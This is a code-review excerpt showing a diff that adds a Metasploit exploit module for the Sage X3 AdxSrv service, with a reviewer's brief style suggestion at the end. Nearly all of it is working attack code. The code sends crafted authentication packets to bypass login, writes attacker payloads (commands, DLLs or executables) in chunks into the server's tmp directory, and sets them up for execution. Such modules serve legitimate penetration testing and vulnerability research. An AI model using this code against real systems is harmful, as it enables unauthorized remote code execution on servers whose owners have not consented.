modules/exploits/x3/x3_adxsrv_auth_bypass_cmd_exec.rb

```diff
@@ -0,0 +1,342 @@
+    # Note: the first byte of this auth packet is different from the ADXDIR command
+
+    revsagedir = sagedir.gsub('\\', '/')
+
+    s.write("\x06\x00")
+    auth_resp = s.read(1024)
+    if auth_resp.length != 4
+      fail_with(Failure::UnexpectedReply, 'Directory message did not provide intended response')
+    end
+    print_good('Command authentication successful.')
+
+    # May require additional information such as file path
+    # this will be used for multiple messages
+
+    head = "\x00\x00\x36\x02\x00\x2e\x00" # head
+    fmt = '@%s/tmp/cmd%s$cmd'
+    if target == 'Windows DLL'
+      fmt = '@%s/tmp/cmd%s.dll'
+    end
+    if (target == 'Windows Executable') || (target == 'Custom Executable')
+      fmt = '@%s/tmp/cmd%s.exe'
+    end
+    pload = format(fmt, revsagedir, filenum)
+    tail = "\x00\x03\x00\x01\x77"
+    sendbuf = build_buffer(head, pload, tail)
+    s.write(sendbuf)
+    s.read(1024)
+
+    # Packet --- 3
+    # Creating the packet that contains the command to run
+    head = "\x02\x00\x05\x08\x00\x00\x00"
+
+    # this writes the data to the .cmd file to get executed
+    # a single write can't be larger than ~250 bytes
+    # so writes larger than 250 need to be broken up
+    written = 0
+    print_status('Writing data')
+    while written < sage_payload.length
+      print('.')
+      towrite = sage_payload[written..written + 250]
+      sendbuf = build_buffer(head, towrite, nil)
+      s.write(sendbuf)
+      s.recv(1024)
+
+      written += towrite.length
+    end
+    print("\r\n")
+  end
+
+  def exploit
+    unless datastore['CMD'].blank?
+      sage_payload = datastore['CMD']
+    end
+    if (target.name == 'Windows Command') && sage_payload.blank?
+      fail_with(Failure::BadConfig, 'Select a different target or set CMD option')
+    end
+    if target.name == 'Windows DLL'
+      sage_payload = generate_payload_dll
+    end
+    if target.name == 'Windows Executable'
+      sage_payload = generate_payload_exe
+    end
+
+    # Read the contents of the provided filename into the sage_payload variable
+    if target.name == 'Custom Executable'
+      if datastore['FILENAME'].empty?
+        fail_with(Failure::BadConfig, 'You selected the custom executable target but did not provide a file, aborting')
+      end
+      file_handle = File.open(datastore['FILENAME'])
+      if file_handle.nil?
+        fail_with(Failure::BadConfig, 'Provided file was unable to be opened, does it exist? Aborting')
+      end
+      sage_payload = file_handle.read
+      file_handle.close
+      if sage_payload.empty? || sage_payload.nil?
+        fail_with(Failure::BadConfig, 'File contents were empty')
+      end
+    end
+
+    sagedir = adxdir
+    if sagedir == false
+      fail_with(Failure::NotVulnerable, 'No directory was returned by the remote host, this system may not be vulnerable')
+    end
+
+    revsagedir = sagedir.gsub('\\', '/')
+    filenum = rand(10_000_000..99_999_999).to_s
```

Comment:
To generate a number that's 8 characters wide, you can use `rand_text_numeric` method.

```suggestion
    filenum = rand_text_numeric(8)
```